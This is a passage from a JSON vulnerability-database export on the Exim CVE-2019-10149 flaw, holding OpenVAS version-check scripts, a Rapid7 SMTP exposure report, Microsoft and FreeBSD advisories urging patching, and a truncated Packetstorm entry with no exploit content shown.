ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T16:54:42", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-06-08T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Security (openSUSE-SU-2019:1524-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852550", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852550", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852550\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-10149\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-06-08 02:01:02 +0000 (Sat, 08 Jun 2019)\");\n script_name(\"openSUSE: Security Advisory for Security (openSUSE-SU-2019:1524-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:1524-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-06/msg00020.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Security'\n package(s) announced via the openSUSE-SU-2019:1524-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"exim was updated to fix a security issue.\n\n - CVE-2019-10149: Fixed a Remote Command Execution in exim (bsc#1136587)\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-1524=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-1524=1\");\n\n script_tag(name:\"affected\", value:\"'Security' package(s) on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-07T14:49:24", "description": "Exim is prone to an unauthenticated remote code execution vulnerability.", "cvss3": {}, "published": "2019-06-07T00:00:00", "type": "openvas", "title": "Exim 4.87 - 4.91 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "id": "OPENVAS:1361412562310140090", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140090", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:exim:exim\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140090\");\n script_version(\"2019-06-07T01:42:55+0000\");\n script_tag(name:\"last_modification\", value:\"2019-06-07 01:42:55 +0000 (Fri, 07 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-07 01:35:15 +0000 (Fri, 07 Jun 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-10149\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Exim 4.87 - 4.91 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_exim_detect.nasl\");\n script_mandatory_keys(\"exim/installed\");\n\n script_tag(name:\"summary\", value:\"Exim is prone to an unauthenticated remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Improper validation of recipient address in deliver_message() function in\n /src/deliver.c may lead to remote command execution.\");\n\n script_tag(name:\"affected\", value:\"Exim version 4.87 to 4.91.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.92 or later or apply the provided patch.\");\n\n script_xref(name:\"URL\", value:\"https://www.exim.org/static/doc/security/CVE-2019-10149.txt\");\n script_xref(name:\"URL\", value:\"https://www.openwall.com/lists/oss-security/2019/06/05/3\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"4.87\", test_version2: \"4.91\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.92\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-10-02T14:39:33", "description": "![NICER Protocol Deep Dive: Internet Exposure of SMTP](https://blog.rapid7.com/content/images/2020/10/NICER-Protocol-Deep-Dive--Internet-Exposure-of-SMTP2.jpg)\n\nWelcome to the NICER Protocol Deep Dive blog series! When we started researching what all was out on the internet way back in January, we had no idea we'd end up with a hefty, 137-page tome of a research report. The sheer length of such a thing might put off folks who might otherwise learn a thing or two about the nature of internet exposure, so we figured, why not break up all the protocol studies into their own reports?\n\nSo, here we are! What follows is taken directly from our National / Industry / Cloud Exposure Report (NICER), so if you don't want to wait around for the next installment, you can cheat and read ahead!\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)\n\n \n\n\n## SMTP (25/465/587)\n\n_The \u201cSimple\u201d in SMTP is intended to be ironic._\n\n#### TLDR\n\n * **WHAT IT IS:** A usually cleartext, text-based standard for delivering email between networks.\n * **HOW MANY**: 5,805,012 discovered nodes on port 25 and 4,007,931 on port 587. SMTPS on port 465 comes in with 3,494,067. All together, that's 13,307,010 distinct service nodes. 3,023,486 (52%) have Recog fingerprints (43 total service families)\n * **VULNERABILITIES: **The natively cleartext nature of email is the primary concern around the security of this protocol. Email is also the most popular method for phishing users into revealing passwords and running malware. Finally, there are at least two serious vulnerabilities in popular mail servers Exim and Microsoft Exchange deployed today.\n * **ADVICE: **Mail administrators need to be fanatical about applying security patches as they become available, and should implement DMARC anti-spoofing controls yesterday.\n * **ALTERNATIVES: **Outsourcing email to a cloud provider, such as Google or Microsoft, is often the right choice when comparing the costs of effectively maintaining this critical internet infrastructure.\n * **GETTING: **Better (25/587)! Fewer crazy people are hosting their own mail.\n\n### SMTP discovery details\n\nWhile SMTP is traditionally cleartext with an optional secure protocol negotiation called STARTTLS, we're seeing more SSL-wrapped SMTP, also known as SMTPS, in the world today. The following charts and tables illustrate the distribution of SMTP over port 25, SMTP on port 587 (which is intended for SMTP-to-SMTP relaying of messages), and SMTPS on port 465.\n\n![NICER Protocol Deep Dive: Internet Exposure of SMTP](https://blog.rapid7.com/content/images/2020/10/encrypted-vs-unencrypted.png) Country | SMTP (25) | SMTP (587) | SMTPS (465) \n---|---|---|--- \nUnited States | 1,467,077 | 1,456,598 | 1,253,805 \nGermany | 637,569 | 373,266 | 375,526 \nJapan | 589,222 | 382,133 | 222,633 \nFrance | 398,390 | 212,937 | 196,177 \nPoland | 306,368 | 289,522 | 284,297 \nSpain | 291,844 | 44,435 | 48,694 \nRussia | 245,814 | 104,709 | 95,972 \nUnited Kingdom | 193,073 | 121,902 | 122,069 \nNetherlands | 189,456 | 129,690 | 115,211 \nCanada | 137,342 | 146,323 | 132,133 \n![NICER Protocol Deep Dive: Internet Exposure of SMTP](https://blog.rapid7.com/content/images/2020/10/encrypted-unencrypted-cloud.png) Provider | SMTP (25) | SMTP (587) | SMTPS (465) \n---|---|---|--- \nOVHcloud | 317,584 | 248,695 | 236,772 \nAmazon | 95,175 | 32,579 | 31,438 \nDigitalOcean | 74,097 | 46,521 | 41,234 \nScaleway | 30,876 | 15,332 | 12,594 \nQuadraNet | 29,282 | 18,200 | 8,667 \nGoogle | 29,030 | 50,422 | 50,561 \nMicrosoft | 14,945 | 5,576 | 2,790 \nRackspace | 8,459 | 2,511 | 1,841 \nAlibaba | 5,729 | 3,863 | 3,826 \nOracle | 1,274 | 509 | 345 \n \nAs far as top-level domains are concerned, we see that the vast majority of SMTP lives in dot-com land\u2014we counted over 100 million MX records in dot-com registrations, with a sharp drop-off in dot-de, dot-net, and dot-org, with about 10 million MX records in each.\n\n### SMTP exposure information\n\nThere are dozens of SMTP servers to choose from, each with their own idiosyncratic methods of configuration, spam filtering, and security. The top SMTP server we're able to fingerprint is Postfix, with over a million and a half installs, followed by Exim, Exchange, and trusty Sendmail. The table below is the complete list of every SMTP server we positively identified\u2014mail administrators will recognize the vestiges of old, little-used mail servers, such as the venerable Lotus Domino and ZMailer. If these are your mail servers, think long and hard about why you\u2019re still running these as opposed to simply farming this thankless chore out to a dedicated mail service provider.\n\nSMTP Family | Count \n---|--- \nPostfix | 1,679,222 \nexim | 759,799 \nExchange Server | 182,263 \nSendmail | 180,812 \nMail Server | 84,262 \nIIS | 58,720 \nEcelerity Mail Server | 25,206 \nMDaemon | 14,404 \nConnect | 10,447 \nIMail Server | 5,354 \nPro | 3,462 \nIBM Domino | 3,445 \nTwisted | 1,999 \nUTM | 1,926 \nWinWebMail | 1,879 \nEmail Security | 1,867 \nListManager | 1,785 \nLotus Domino | 1,734 \nDavid | 1,490 \nPowerMTA | 1,239 \nCCProxy | 675 \nMailSite | 305 \nPost.Office | 275 \nVPOP3 | 245 \nZMailer | 205 \nGroupWise | 176 \nCheck Point | 78 \nWinRoute | 43 \nMessaging Server | 40 \nVOPMail | 24 \nIntraStore | 22 \nInternet Mail Server | 18 \nNTMail | 17 \nMercury Mail Transport System | 15 \nFWTK | 9 \nSLMail | 8 \nFTGate | 4 \nInternet Mail Services | 4 \nVM | 3 \nMail-Max | 2 \nAppleShare IP Mail Server | 1 \nMERCUR | 1 \nWebShield | 1 \n \nFinally, let's take a quick look at the Exim mail server. Like most other popular software on the internet, we can find all sorts of versions. Unlike other popular software, Exim versioning moves pretty quickly\u2014the current version of Exim at the time of scanning was v 4.93, and has already incremented to 4.94 by the time of publication. However, the popularity of the latest version (4.93) versus next-to-latest (4.92.x) is in the 100,000 range, and given the intense scrutiny afforded to Exim by national intelligence agencies, this delta can be pretty troubling. It\u2019s so troubling that the [American National Security Agency issued an advisory](<https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf>) urging Exim administrators to patch and upgrade as soon as possible to avoid exploitation by the \u201cSandworm team.\u201d Specifically, the vulnerability exploited was CVE-2019-10149, and affects versions 4.87 through 4.91\u2014as of the time of our scans, we found approximately 87,500 such servers exposed to the internet. While this is about a fifth of all Exim servers out there, exposed vulnerabilities in mail servers tend to shoot to the top of any list of \u201cmust patch now\u201d vulns.\n\n### Attacker\u2019s view\n\nGiven the high value attackers tend to assign to SMTP vulnerabilities, it\u2019s no surprise that we see fairly consistent scanning action among threat actors in our SMTP honeypots.\n\n![NICER Protocol Deep Dive: Internet Exposure of SMTP](https://blog.rapid7.com/content/images/2020/10/project-heisenberg-smtp.png) Date | SMTP Port | Count | Percentage | Provider \n---|---|---|---|--- \n2020-02-15 | 25 | 518 | 12.92% | Sprint (Poland) \n2020-02-15 | 25 | 514 | 12.82% | China Telecom \n2020-02-15 | 25 | 409 | 10.20% | Tele Asia Hosting \n2020-02-15 | 465 | 4,337 | 99.18% | DigitalOcean \n2020-02-15 | 587 | 4,568 | 99.65% | DigitalOcean \n2020-02-26 | 25 | 32,495 | 73.97% | Hostwinds \n2020-02-26 | 25 | 6,504 | 14.81% | Sprint (Poland) \n2020-02-26 | 25 | 2,730 | 6.21% | Tamatiya Eood Hosting \n2020-02-26 | 465 | 851 | 69.36% | DigitalOcean \n2020-02-26 | 465 | 344 | 28.04% | Web Hosted Group \n2020-02-26 | 587 | 948 | 94.33% | DigitalOcean \n2020-03-25 | 25 | 4,930 | 41.55% | Microsoft 365 \n2020-03-25 | 25 | 1,481 | 12.48% | Locaweb Hosting \n2020-03-25 | 25 | 509 | 4.29% | Hurricane Electric \n2020-03-25 | 465 | 415 | 95.62% | DigitalOcean \n2020-03-25 | 587 | 408 | 97.14% | DigitalOcean \n2020-05-09 | 25 | 1,180 | 58.13% | Vietnam Telecom \n2020-05-09 | 25 | 195 | 9.61% | Zumy Communications \n2020-05-09 | 25 | 159 | 7.83% | China Telecom \n2020-05-09 | 465 | 6,641 | 94.91% | Microsoft 365 \n2020-05-09 | 465 | 326 | 4.66% | DigitalOcean \n2020-05-09 | 587 | 316 | 95.18% | DigitalOcean \n \n### Our advice around SMTP\n\n**IT and IT security teams **should seriously consider converting over to an established email provider such as Microsoft's Office 365 or Google's G Suite. Running your own email remains one of the more truly painful network administration tasks, since outages, patch management, and redundant backups can be tricky even in the best of times, to say nothing of the constant drain of resources in the fight against spam and phishing. Established providers in this space have a proven track record of handling both spam and phishing, as well as achieving remarkable uptimes.\n\n**Cloud providers** should provide rock-solid documentation on how to set up SMTP services for their customers, starting with SSL-wrapped SMTP as a default configuration. This is one case where we wouldn't be opposed to providers such as Microsoft and Google inserting a little adver-docu-tizing pushing customers over to their hosted mail solutions.\n\n**Government cybersecurity agencies **should recognize that everyone is challenged by running merely serviceable email infrastructure, and very few organizations are truly excellent at it at any reasonable scale. As far as content-based attacks are concerned, these experts should continue pressing for minimum technical defenses, such as DMARC, and user education in recognizing and avoiding phishing scams.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2020-10-02T13:58:23", "type": "rapid7blog", "title": "NICER Protocol Deep Dive: Internet Exposure of SMTP", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2020-10-02T13:58:23", "id": "RAPID7BLOG:F3A304F4033DF3E6F81CCD52475053BD", "href": "https://blog.rapid7.com/2020/10/02/nicer-protocol-deep-dive-internet-exposure-of-smtp/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "msrc": [{"lastseen": "2019-07-09T01:32:56", "description": "This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, CVE-2019-10149, in Linux Exim email servers running Exim version 4.87 to 4.91. Microsoft Azure infrastructure and Services are not affected; only customer\u2019s Linux IaaS instances running a vulnerable version of Exim are affected. Azure customers running VMs with Exim 4.92 are not \u2026\n\n[ Prevent the impact of a Linux worm by updating Exim (CVE-2019-10149) Read More \u00bb](<https://msrc-blog.microsoft.com/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-14T00:27:32", "type": "msrc", "title": "Prevent the impact of a Linux worm by updating Exim (CVE-2019-10149)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-14T00:27:32", "id": "MSRC:31C9A6AB6048DC2F0939A862156094A7", "href": "https://msrc-blog.microsoft.com/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-13T15:07:07", "description": "This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, CVE-2019-10149, in Linux Exim email servers running Exim version 4.87 to 4.91. Microsoft Azure infrastructure and Services are not affected; only customer\u2019s Linux IaaS instances running a vulnerable version of Exim are affected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-13T07:00:00", "type": "msrc", "title": "Prevent the impact of a Linux worm by updating Exim (CVE-2019-10149)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-13T07:00:00", "id": "MSRC:143E928D2AB55AAFB38D0E001ACA1ACC", "href": "/blog/2019/06/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-22T16:39:48", "description": "This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, CVE-2019-10149, in Linux Exim email servers running Exim version 4.87 to 4.91. Microsoft Azure infrastructure and Services are not affected; only customer\u2019s Linux IaaS instances running a vulnerable version of Exim are affected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-13T07:00:00", "type": "msrc", "title": "Prevent the impact of a Linux worm by updating Exim (CVE-2019-10149)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-13T07:00:00", "id": "MSRC:C2E579B14FD78ED4E967BE9A12DA2ACA", "href": "https://msrc.microsoft.com/blog/2019/06/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-19T01:21:56", "description": "This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, [CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>), in Linux Exim email servers running Exim version 4.87 to 4.91. Microsoft Azure infrastructure and Services are not affected; only customer\u2019s Linux IaaS instances running a vulnerable version of Exim are affected. Azure customers running VMs with Exim 4.92 are not affected by this vulnerability.\n\nAzure has controls in place to help limit the spread of this worm from work we\u2019ve already done to [combat SPAM](<https://blogs.msdn.microsoft.com/mast/2017/11/15/enhanced-azure-security-for-sending-emails-november-2017-update/>), but customers using the vulnerable software would still be susceptible to infection.\n\nCustomers using [Azure virtual machines (VMs)](<https://azure.microsoft.com/services/virtual-machines/>) are responsible for updating the operating systems running on their VMs. As this vulnerability is being actively exploited by worm activity, MSRC urges customers to observe [Azure security best practices and patterns](<https://docs.microsoft.com/en-us/azure/security/security-best-practices-and-patterns>) and to patch or restrict network access to VMs running the affected versions of Exim.\n\nThere is a partial mitigation for affected systems that can filter or block network traffic via [Network Security Groups (NSGs)](<https://docs.microsoft.com/en-us/azure/virtual-network/security-overview>). The affected systems can mitigate Internet-based \u2018wormable\u2019 malware or advanced malware threats that could exploit the vulnerability. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker\u2019s IP Address is permitted through Network Security Groups. \n\nIt is for these reasons that we strongly advise that all affected systems \u2013 irrespective of whether NSGs are filtering traffic or not \u2013 should be updated as soon as possible. \n\n**Resources:**\n\n[Links to Azure Network Security Group Documentation](<https://docs.microsoft.com/en-us/azure/virtual-network/security-overview>) \n[Links to Update Management Solutions using Azure Automation](<https://docs.microsoft.com/en-us/azure/automation/automation-update-management>) \n[Links to Azure Security Best Practices and Patterns](<https://docs.microsoft.com/en-us/azure/security/security-best-practices-and-patterns>)\n\n_JR Aquino \n__Manager, Azure Incident Response \n__Microsoft Security Response Center (MSRC_)\n\n* * *\n\n_updated 18 June 2019 to clarify \"Microsoft Azure infrastructure and Services are not affected; only customer\u2019s Linux IaaS instances running a vulnerable version of Exim are affected.\"_", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-15T03:48:55", "type": "msrc", "title": "Prevent the impact of a Linux worm by updating Exim (CVE-2019-10149)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-15T03:48:55", "id": "MSRC:388A48CE67D2E58B0FB4372836DA1089", "href": "https://blogs.technet.microsoft.com/msrc/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2023-06-13T16:08:16", "description": "\n\nExim team and Qualys report:\n\n\n\t We received a report of a possible remote exploit. Currently there is no evidence of an active use of this exploit.\n\t \n\n\t A patch exists already, is being tested, and backported to all\n\t versions we released since (and including) 4.87.\n\t \n\n\t The severity depends on your configuration. It depends on how close to\n\t the standard configuration your Exim runtime configuration is. The\n\t closer the better.\n\t \n\n\t Exim 4.92 is not vulnerable.\n\t \n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-27T00:00:00", "type": "freebsd", "title": "Exim -- RCE in deliver_message() function", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-05-27T00:00:00", "id": "45BEA6B5-8855-11E9-8D41-97657151F8C2", "href": "https://vuxml.freebsd.org/freebsd/45bea6b5-8855-11e9-8d41-97657151f8c2.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2019-08-24T22:40:27", "description": "", "cvss3": {}, "published": "2019-08-23T00:00:00", "type": "packetstorm", "title": "Exim 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-08-23T00:00:00", "id": "PACKETSTORM:154198", "href": 